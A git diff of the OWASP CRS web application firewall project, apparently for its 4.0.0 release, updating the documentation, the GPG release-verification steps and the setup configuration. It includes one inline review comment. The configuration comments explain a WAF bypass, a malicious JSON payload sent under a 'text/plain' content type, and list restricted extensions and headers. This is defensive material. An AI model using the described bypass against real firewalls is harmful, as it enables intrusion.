Therefore, it is a good option to start fresh without your old exclusion rules. + +If you are experienced in writing exclusion rules for CRS 2.x, it may be worthwhile to try running CRS 3 in Paranoia Level 2 (PL2). This is a stricter mode, which blocks additional attack patterns, but brings a higher number of false positives — in many situations the false positives will be comparable with CRS 2.x. This paranoia level however will bring you a higher protection level than CRS 2.x or a CRS 3 default install, so it can be worth the investment. diff --git a/KNOWN_BUGS b/KNOWN_BUGS.md similarity index 77% rename from KNOWN_BUGS rename to KNOWN_BUGS.md index d8083dcc2e..221d0f21eb 100644 --- a/KNOWN_BUGS +++ b/KNOWN_BUGS.md @@ -1,9 +1,10 @@ -== OWASP ModSecurity Core Rule Set (CRS) KNOWN BUGS == +# CRS KNOWN BUGS -== Report Bugs/Issues to GitHub Issues Tracker or the mailinglist == -* https://github.com/SpiderLabs/owasp-modsecurity-crs/issues +## Report Bugs/Issues to GitHub Issues Tracker or the mailinglist + +* https://github.com/coreruleset/coreruleset/issues or the CRS Google Group at -* https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project +* https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project * There are still false positives for standard web applications in the default install (paranoia level 1). Please report these when @@ -26,7 +27,7 @@ or the CRS Google Group at We advise to upgrade your Apache version. If upgrading is not possible, we have provided a script in the util/join-multiline-rules directory which converts the rules into a format that works around the bug. - You have to re-run this script whenever you modify or update + You have to re-run this script whenever you modify or update the CRS rules. * Debian up to and including Jessie lacks YAJL/JSON support in ModSecurity, which causes the following error in the Apache ErrorLog or SecAuditLog: 
@@ -38,13 +39,11 @@ or the CRS Google Group at type by default, as specified in RFC 3902. OF IMPORTANCE, application/soap+xml is indicative that XML will be provided. In accordance with this, ModSecurity's XML Request Body Processor should also be configured to support this MIME type. Within - the ModSecurity project, commit 5e4e2af - (https://github.com/SpiderLabs/ModSecurity/commit/5e4e2af7a6f07854fee6ed36ef4a381d4e03960e) + the ModSecurity project, [commit 5e4e2af](https://github.com/owasp-modsecurity/ModSecurity/commit/5e4e2af7a6f07854fee6ed36ef4a381d4e03960e) has been merged to support this endeavour. However, if you are running a modified or preexisting version of the modsecurity.conf provided by this repository, you may wish to upgrade rule '200000' accordingly. The rule now appears as follows: - -``` -SecRule REQUEST_HEADERS:Content-Type "(?:application(?:/soap\+|/)|text/)xml" \ - "id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" -``` + ``` + SecRule REQUEST_HEADERS:Content-Type "(?:application(?:/soap\+|/)|text/)xml" \ + "id:'200000',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML" + ``` diff --git a/LICENSE b/LICENSE index b671fe62ac..5dbb919094 100644 --- a/LICENSE +++ b/LICENSE @@ -186,7 +186,7 @@ same "printed page" as the copyright notice for easier identification within third-party archives. - Copyright 2006 the OWASP Core Rule Set contributors + Copyright 2024 OWASP CRS project Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. diff --git a/README.md b/README.md index 44f93e8782..cc27e56a0e 100644 --- a/README.md +++ b/README.md @@ -1,32 +1,33 @@ +![GHA build main](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=main)
+![GHA build v4.0/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v4.0%2Fdev) ![GHA build v3.3/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.3%2Fdev) -![GHA build v3.2/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.2%2Fdev) -![GHA build v3.1/dev](https://github.com/coreruleset/coreruleset/workflows/Regression%20Tests/badge.svg?branch=v3.1%2Fdev) [![OWASP Flagship](https://img.shields.io/badge/owasp-flagship%20project-38a047.svg)](https://owasp.org/projects/) [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/1390/badge)](https://bestpractices.coreinfrastructure.org/projects/1390) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) -# OWASP ModSecurity Core Rule Set (CRS) +# OWASP CRS -The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts. +The OWASP CRS is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls. The CRS aims to protect web applications from a wide range of attacks, including the OWASP Top Ten, with a minimum of false alerts. ## CRS Resources -Please see the [OWASP ModSecurity Core Rule Set page](https://coreruleset.org/) to get introduced to the CRS and view resources on installation, configuration, and working with the CRS. +Please see the [OWASP CRS page](https://coreruleset.org/) to get introduced to the CRS and view resources on installation, configuration, and working with the CRS. ## Contributing to the CRS -We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. 
We are interested in hearing any bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections. +We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false-positive alert reports, evasions, usability issues, and suggestions for new detections. -[Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log. +[Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log. We will try and address your issue and potentially ask for additional information to reproduce your problem. Please also note that stale issues will be flagged and closed after 120 days. You can search for stale issues with the following [search query](https://github.com/coreruleset/coreruleset/issues?q=label%3A%22Stale+issue%22). -[Sign up for our Google Group](https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list. +[Sign up for our Google Group](https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list. -[Join the #coreruleset channel on OWASP Slack](http://owaspslack.com) to chat about the CRS. 
+[Join the #coreruleset channel on OWASP Slack](https://owasp.slack.com/) to chat about the CRS. ([Click here](https://owasp.org/slack/invite) to get an invitation if you are not yet registered on the OWASP slack. It's open to non-members too.) ## License -Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+Copyright (c) 2021-2024 CRS project. All rights reserved. -The OWASP ModSecurity Core Rule Set is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details. +The OWASP CRS is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details. diff --git a/SECURITY.md b/SECURITY.md index 844d55a8bf..e09a0bd3a0 100644 --- a/SECURITY.md +++ b/SECURITY.md 
@@ -3,33 +3,88 @@ ## Supported Versions OWASP CRS has two types of releases, Major releases (3.0.0, 3.1.0, 3.2.0 etc.) and point releases (3.0.1, 3.0.2 etc.). -For more information see our [wiki](https://github.com/SpiderLabs/owasp-modsecurity-crs/wiki/Release-Policy). -The OWASP CRS officially supports the two point releases with security patching preceding the current major release . +For more information see our [wiki](https://github.com/coreruleset/coreruleset/wiki/Release-Policy). + +The OWASP CRS officially supports the two latest point releases with severe security patches. We are happy to receive and merge PR's that address security issues in older versions of the project, but the team itself may choose not to fix these. Along those lines, OWASP CRS team may not issue security notifications for unsupported software. | Version | Supported | | --------- | ------------------ | -| 3.3.x-dev | :white_check_mark: | -| 3.2.x | :white_check_mark: | -| 3.1.x | :white_check_mark: | +| 4.0.0 | :white_check_mark: | +| 3.3.x | :white_check_mark: | +| 3.2.x | :x: | +| 3.1.x | :x: | | 3.0.x | :x: | +| 2.x | :x: | + +## GPG Signed Releases + +Releases are signed using [our GPG key](https://coreruleset.org/security.asc), (fingerprint: 3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72). You can verify the release using GPG/PGP compatible tooling. + +### Importing the GPG Key + +To get our key using gpg: `gpg --keyserver pgp.mit.edu --recv 0x38EEACA1AB8A6E72` (this id should be equal to the last sixteen hex characters in our fingerprint). +You can also use `gpg --fetch-key https://coreruleset.org/security.asc` directly. + +### Verifying the CRS Release + +Download the release file and the corresponding signature. 
The following example shows how to do it for `v4.0.0` release: + +```bash +$ wget https://github.com/coreruleset/coreruleset/archive/refs/tags/v4.0.0.tar.gz +$ wget https://github.com/coreruleset/coreruleset/releases/download/v4.0.0/coreruleset-4.0.0.tar.gz.asc +``` + +**Verification**: + +```bash +❯ gpg --verify coreruleset-4.0.0.tar.gz.asc v4.0.0.tar.gz +gpg: Signature made Wed Jun 30 10:05:48 2021 -03 +gpg: using RSA key 36006F0E0BA167832158821138EEACA1AB8A6E72 +gpg: Good signature from "OWASP Core Rule Set " [unknown] +gpg: WARNING: This key is not certified with a trusted signature! +gpg: There is no indication that the signature belongs to the owner. +Primary key fingerprint: 3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72 +``` + +If the signature was good, the verification succeeded. If you see a warning like the above, it means you know our public key, but you are not trusting it. You can trust it by using the following method: + +```bash +gpg edit-key 36006F0E0BA167832158821138EEACA1AB8A6E72 +gpg> trust +Your decision: 5 (ultimate trust) +Are you sure: Yes +gpg> quit +``` + +Then you will see this result when verifying: +```bash +gpg --verify coreruleset-4.0.0.tar.gz.asc v4.0.0.tar.gz +gpg: Signature made Wed Jun 30 15:05:48 2021 CEST +gpg: using RSA key 36006F0E0BA167832158821138EEACA1AB8A6E72 +gpg: Good signature from "OWASP Core Rule Set " [ultimate] +``` ## Reporting a Vulnerability -We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. +We strive to make the OWASP CRS accessible to a wide audience of beginner and experienced users. We welcome bug reports, false positive alert reports, evasions, usability issues, and suggestions for new detections. Submit these types of non-vulnerability related issues via Github. Please include your installed version and the relevant portions of your audit log. 
-False negative or common bypasses should [create an issue](https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/new) so they can be addressed. +False negative or common bypasses should [create an issue](https://github.com/coreruleset/coreruleset/issues/new) so they can be addressed. Do this before submitting a vulnerability using our email: 1) Verify that you have the latest version of OWASP CRS. 2) Validate which Paranoia Level this bypass applies to. If it works in PL4, please send us an email. 3) If you detected anything that causes unexpected behavior of the engine via manipulation of existing CRS provided rules, please send it by email. -Our email is [security@coreruleset.org](mailto:security@coreruleset.org). You can send us encrypted email using [this key](https://coreruleset.org/security.asc), (fingerprint: `3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72`). +We also provide you with the [Sandbox project](https://coreruleset.org/docs/development/sandbox/), where you can test your bypass and report back to us. If testing using the sandbox, please include the `X-Unique-ID` from the response in your email. + +Our email is [security@coreruleset.org](mailto:security@coreruleset.org). You can send us encrypted email using the same GPG key we use to sign releases, fingerprint: `3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72`. We are happy to work with the community to provide CVE identifiers for any discovered security issues if requested. If in doubt, feel free to reach out to us! + +The OWASP CRS Team. diff --git a/SPONSORS.md b/SPONSORS.md new file mode 100644 index 0000000000..7e4a32e6d9 --- /dev/null +++ b/SPONSORS.md @@ -0,0 +1,8 @@ +## GOLD SPONSORS + +* Google +* United Security Providers + +## SILVER SPONSORS + +* Swiss Post diff --git a/crs-setup.conf.example b/crs-setup.conf.example index 6e1899685d..17cd6a9625 100644 --- a/crs-setup.conf.example +++ b/crs-setup.conf.example 
@@ -1,8 +1,9 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.3.0
+# OWASP CRS ver.4.0.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
-# The OWASP ModSecurity Core Rule Set is distributed under
+# The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
@@ -11,15 +12,15 @@
 #
 # -- [[ Introduction ]] --------------------------------------------------------
 #
-# The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack
+# The OWASP CRS is a set of generic attack
 # detection rules that provide a base level of protection for any web
 # application. They are written for the open source, cross-platform
 # ModSecurity Web Application Firewall.
 #
 # See also:
 # https://coreruleset.org/
-# https://github.com/SpiderLabs/owasp-modsecurity-crs
-# https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
+# https://github.com/coreruleset/coreruleset
+# https://owasp.org/www-project-modsecurity-core-rule-set/
 #
@@ -174,12 +175,12 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # Uncomment this rule to change the default:
 #
 #SecAction \
-# "id:900000,\
-# phase:1,\
-# nolog,\
-# pass,\
-# t:none,\
-# setvar:tx.paranoia_level=1"
+# "id:900000,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.blocking_paranoia_level=1"
 # It is possible to execute rules from a higher paranoia level but not include
@@ -188,24 +189,24 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # the new rules would lead to false positives that raise your score above the
 # threshold.
 # This optional feature is enabled by uncommenting the following rule and
-# setting the tx.executing_paranoia_level.
-# Technically, rules up to the level defined in tx.executing_paranoia_level
-# will be executed, but only the rules up to tx.paranoia_level affect the
+# setting the tx.detection_paranoia_level.
+# Technically, rules up to the level defined in tx.detection_paranoia_level
+# will be executed, but only the rules up to tx.blocking_paranoia_level affect the
 # anomaly scores.
-# By default, tx.executing_paranoia_level is set to tx.paranoia_level.
-# tx.executing_paranoia_level must not be lower than tx.paranoia_level.
+# By default, tx.detection_paranoia_level is set to tx.blocking_paranoia_level.
+# tx.detection_paranoia_level must not be lower than tx.blocking_paranoia_level.
 #
-# Please notice that setting tx.executing_paranoia_level to a higher paranoia
+# Please notice that setting tx.detection_paranoia_level to a higher paranoia
 # level results in a performance impact that is equally high as setting
-# tx.paranoia_level to said level.
+# tx.blocking_paranoia_level to said level.
 #
 #SecAction \
-# "id:900001,\
-# phase:1,\
-# nolog,\
-# pass,\
-# t:none,\
-# setvar:tx.executing_paranoia_level=1"
+# "id:900001,\
+# phase:1,\
+# pass,\
+# t:none,\
+# nolog,\
+# setvar:tx.detection_paranoia_level=1"
 #
@@ -224,16 +225,16 @@ SecDefaultAction "phase:2,log,auditlog,pass" # Uncomment this rule to change the default: # #SecAction \ -# "id:900010,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.enforce_bodyproc_urlencoded=1" +# "id:900010,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.enforce_bodyproc_urlencoded=1" # -# -- [[ Anomaly Mode Severity Levels ]] ---------------------------------------- +# -- [[ Anomaly Scoring Mode Severity Levels ]] -------------------------------- # # Each rule in the CRS has an associated severity level. # These are the default scoring points for each severity level. @@ -257,19 +258,19 @@ SecDefaultAction "phase:2,log,auditlog,pass" # that all configuration variables are set before the CRS rules are processed.) # #SecAction \ -# "id:900100,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.critical_anomaly_score=5,\ -# setvar:tx.error_anomaly_score=4,\ -# setvar:tx.warning_anomaly_score=3,\ -# setvar:tx.notice_anomaly_score=2" +# "id:900100,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.critical_anomaly_score=5,\ +# setvar:tx.error_anomaly_score=4,\ +# setvar:tx.warning_anomaly_score=3,\ +# setvar:tx.notice_anomaly_score=2" # -# -- [[ Anomaly Mode Blocking Threshold Levels ]] ------------------------------ +# -- [[ Anomaly Scoring Mode Blocking Threshold Levels ]] ---------------------- # # Here, you can specify at which cumulative anomaly score an inbound request, # or outbound response, gets blocked. 
@@ -309,57 +310,121 @@ SecDefaultAction "phase:2,log,auditlog,pass" # Uncomment this rule to change the defaults: # #SecAction \ -# "id:900110,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.inbound_anomaly_score_threshold=5,\ -# setvar:tx.outbound_anomaly_score_threshold=4" - -# -# -- [[ Application Specific Rule Exclusions ]] ---------------------------------------- -# -# Some well-known applications may undertake actions that appear to be -# malicious. This includes actions such as allowing HTML or Javascript within -# parameters. In such cases the CRS aims to prevent false positives by allowing -# administrators to enable prebuilt, application specific exclusions on an -# application by application basis. -# These application specific exclusions are distinct from the rules that would -# be placed in the REQUEST-900-EXCLUSION-RULES-BEFORE-CRS configuration file as -# they are prebuilt for specific applications. The 'REQUEST-900' file is -# designed for users to add their own custom exclusions. Note, using these -# application specific exclusions may loosen restrictions of the CRS, -# especially if used with an application they weren't designed for. As a result -# they should be applied with care. -# To use this functionality you must specify a supported application. To do so -# uncomment rule 900130. In addition to uncommenting the rule you will need to -# specify which application(s) you'd like to enable exclusions for. Only a -# (very) limited set of applications are currently supported, please use the -# filenames prefixed with 'REQUEST-903' to guide you in your selection. 
-# Such filenames use the following convention: -# REQUEST-903.9XXX-{APPNAME}-EXCLUSIONS-RULES.conf -# -# It is recommended if you run multiple web applications on your site to limit -# the effects of the exclusion to only the path where the excluded webapp -# resides using a rule similar to the following example: -# SecRule REQUEST_URI "@beginsWith /wordpress/" setvar:tx.crs_exclusions_wordpress=1 - -# -# Modify and uncomment this rule to select which application: +# "id:900110,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.inbound_anomaly_score_threshold=5,\ +# setvar:tx.outbound_anomaly_score_threshold=4" + + +# +# -- [[ Application Specific Rule Exclusions ]] -------------------------------- +# +# CRS 3.x contained exclusion packages to tweak the CRS for use with common +# web applications, lowering the number of false positives. +# +# In CRS 4, these are no longer part of the CRS itself, but they are available +# as "CRS plugins". Some plugins improve support for web applications, and others +# may bring new functionality. Plugins are not installed by default, but can be +# downloaded from the plugin registry: +# https://github.com/coreruleset/plugin-registry +# +# For detailed information about using and installing plugins, please see: +# https://coreruleset.org/docs/concepts/plugins/ + + +# +# -- [[ Anomaly Score Reporting Level ]] --------------------------------------- +# +# When a request is blocked due to the anomaly score meeting or exceeding the +# anomaly threshold then the blocking rule will also report the anomaly score. +# This applies to the separate inbound and outbound anomaly scores. +# +# In phase 5, there are additional rules that can perform additional reporting +# of anomaly scores with a verbosity that depends on the reporting level defined +# below. +# +# By setting the reporting level you control whether you want additional +# reporting beyond the blocking rule or not and, if yes, which requests should +# be covered. 
The higher the reporting level, the more verbose the reporting is. +# +# There are 6 reporting levels: +# +# 0 - Reporting disabled +# 1 - Reporting for requests with a blocking anomaly score >= a threshold +# 2 - Reporting for requests with a detection anomaly score >= a threshold +# 3 - Reporting for requests with a blocking anomaly score greater than 0 +# 4 - Reporting for requests with a detection anomaly score greater than 0 +# 5 - Reporting for all requests +# +# Note: Reporting levels 1 and 2 make it possible to differentiate between +# requests that are blocked and requests that are *not* blocked but would have +# been blocked if the blocking PL was equal to detection PL. This may be useful +# for certain FP tuning methodologies, for example moving to a higher PL. +# +# A value of 5 can be useful on platforms where you are interested in logging +# non-scoring requests, yet it is not possible to report this information in +# the request/access log. This applies to Nginx, for example. # #SecAction \ -# "id:900130,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:tx.crs_exclusions_cpanel=1,\ -# setvar:tx.crs_exclusions_drupal=1,\ -# setvar:tx.crs_exclusions_dokuwiki=1,\ -# setvar:tx.crs_exclusions_nextcloud=1,\ -# setvar:tx.crs_exclusions_wordpress=1,\ -# setvar:tx.crs_exclusions_xenforo=1" +# "id:900115,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.reporting_level=4" + + +# +# -- [[ Early Anomaly Scoring Mode Blocking ]] ------------------------------ +# +# The anomaly scores for the request and the responses are generally summed up +# and evaluated at the end of phase:2 and at the end of phase:4 respectively. +# However, it is possible to enable an early evaluation of these anomaly scores +# at the end of phase:1 and at the end of phase:3. 
+# +# If a request (or a response) hits the anomaly threshold in this early +# evaluation, then blocking happens immediately (if blocking is enabled) and +# the phase 2 (and phase 4 respectively) will no longer be executed. +# +# Enable the rule 900120 that sets the variable tx.early_blocking to 1 in order +# to enable early blocking. The variable tx.early_blocking is set to 0 by +# default. Early blocking is thus disabled by default. +# +# Please note that early blocking will hide potential alerts from you. This +# means that a payload that would appear in an alert in phase 2 (or phase 4) +# does not get evaluated if the request is being blocked early. So when you +# disabled early blocking again at some point in the future, then new alerts +# from phase 2 might pop up. +#SecAction \ +# "id:900120,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.early_blocking=1" + + +# +# -- [[ Initialize Default Collections ]] ----------------------------------- +# +# CRS provides a centralized option to initialize and populate collections +# meant to be used by plugins (E.g.DoS protection plugin). +# By default, Global and IP collections (see rule 901320), +# being not used by core rules, are not initialized. +# +# Uncomment this rule to change the default: +# +#SecAction \ +# "id:900130,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:tx.enable_default_collections=1" + # # -- [[ HTTP Policy Settings ]] ------------------------------------------------ @@ -370,7 +435,6 @@ SecDefaultAction "phase:2,log,auditlog,pass" # # These variables are used in the following rule files: # - REQUEST-911-METHOD-ENFORCEMENT.conf -# - REQUEST-912-DOS-PROTECTION.conf # - REQUEST-920-PROTOCOL-ENFORCEMENT.conf # HTTP methods that a client is allowed to use. 
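Review bot: The reporting-level table in the new `Anomaly Score Reporting Level` section describes levels 1 and 2 as requests whose score is `>= a threshold` without naming which threshold, so an operator tuning this next to rule 900110 has to guess. Presumably it is `tx.inbound_anomaly_score_threshold` for requests and `tx.outbound_anomaly_score_threshold` for responses; if so, the two lines should say it, e.g. `# 1 - Reporting for requests with a blocking anomaly score >= the inbound/outbound anomaly score threshold` and the same wording for level 2 with "detection". As a point of style, the `Early Anomaly Scoring Mode Blocking` section runs its explanatory comment straight into `#SecAction \` and omits the blank `#` separator and the `# Uncomment this rule to change the default:` line that every other section in this file places before its example rule.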
@@ -380,92 +444,167 @@ SecDefaultAction "phase:2,log,auditlog,pass" # MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH PUT UNLOCK # Uncomment this rule to change the default. #SecAction \ -# "id:900200,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" +# "id:900200,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" # Content-Types that a client is allowed to send in a request. # Default: |application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| -# |text/xml| |application/xml| |application/soap+xml| |application/x-amf| |application/json| -# |application/cloudevents+json| |application/cloudevents-batch+json| |application/octet-stream| -# |application/csp-report| |application/xss-auditor-report| |text/plain| +# |text/xml| |application/xml| |application/soap+xml| |application/json| +# |application/cloudevents+json| |application/cloudevents-batch+json| +# +# Please note, that the rule where CRS uses this variable (920420) evaluates it with operator +# `@within`, which is case sensitive, but uses t:lowercase. You must add your whole custom +# Content-Type with lowercase. +# +# Bypass Warning: some applications may not rely on the content-type request header in order +# to parse the request body. This could make an attacker able to send malicious URLENCODED/JSON/XML +# payloads without being detected by the WAF. Allowing request content-type that doesn't activate any +# body processor (for example: "text/plain", "application/x-amf", "application/octet-stream", etc..) +# could lead to a WAF bypass. For example, a malicious JSON payload submitted with a "text/plain" +# content type may still be interpreted as JSON by a backend application but would not trigger the +# JSON body parser at the WAF, leading to a bypass. +# +# To prevent blocking request with not allowed content-type by default, you can create an exclusion +# rule that removes rule 920420. 
For example: +#SecRule REQUEST_HEADERS:Content-Type "@rx ^text/plain" \ +# "id:1234,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# ctl:ruleRemoveById=920420,\ +# chain" +# SecRule REQUEST_URI "@rx ^/foo/bar" \ +# "t:none" +# # Uncomment this rule to change the default. +# #SecAction \ -# "id:900220,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/x-amf| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json| |application/octet-stream| |application/csp-report| |application/xss-auditor-report| |text/plain|'" +# "id:900220,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" # Allowed HTTP versions. -# Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 -# Example for legacy clients: HTTP/0.9 HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 +# Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0 +# Example for legacy clients: HTTP/0.9 HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0 # Note that some web server versions use 'HTTP/2', some 'HTTP/2.0', so # we include both version strings by default. # Uncomment this rule to change the default. #SecAction \ -# "id:900230,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'" +# "id:900230,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'" # Forbidden file extensions. # Guards against unintended exposure of development/configuration files. 
-# Default: .asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/ +# Default: .asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/ # Example: .bak/ .config/ .conf/ .db/ .ini/ .log/ .old/ .pass/ .pdb/ .rdb/ .sql/ +# Note that .axd was removed due to false positives (see PR 1925). +# +# To additionally guard against configuration/install archive files from being +# accidentally exposed, common archive file extensions can be added to the +# restricted extensions list. An example list of common archive file extensions +# is presented below: +# .7z/ .br/ .bz/ .bz2/ .cab/ .cpio/ .gz/ .img/ .iso/ .jar/ .rar/ .tar/ .tbz2/ .tgz/ .txz/ .xz/ .zip/ .zst/ +# (Source: https://en.wikipedia.org/wiki/List_of_archive_formats) +# # Uncomment this rule to change the default. #SecAction \ -# "id:900240,\ -# phase:1,\ -# nolog,\ -# pass,\ -# t:none,\ -# setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" - -# Forbidden request headers. -# Header names should be lowercase, enclosed by /slashes/ as delimiters. 
-# Blocking Proxy header prevents 'httpoxy' vulnerability: https://httpoxy.org -# Default: /proxy/ /lock-token/ /content-range/ /if/ +# "id:900240,\ +# phase:1,\ +# pass,\ +# t:none,\ +# nolog,\ +# setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" + +# Restricted request headers. +# The HTTP request headers that CRS restricts are split into two categories: +# basic (always forbidden) and extended (may be forbidden). All header names +# should be lowercase and enclosed by /slashes/ as delimiters. +# +# [ Basic ] +# Includes deprecated headers and headers with known security risks. Always +# forbidden. +# Default: /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/ +# +# /content-encoding/ +# Used to list any encodings that have been applied to the original payload. +# Only used for compression, which isn't supported by CRS by default since CRS +# blocks newlines and null bytes inside the request body. Most compression +# algorithms require at least null bytes per RFC. Blocking Content-Encoding +# shouldn't break anything and increases security since WAF engines, including +# ModSecurity, are typically incapable of properly scanning compressed request +# bodies. 
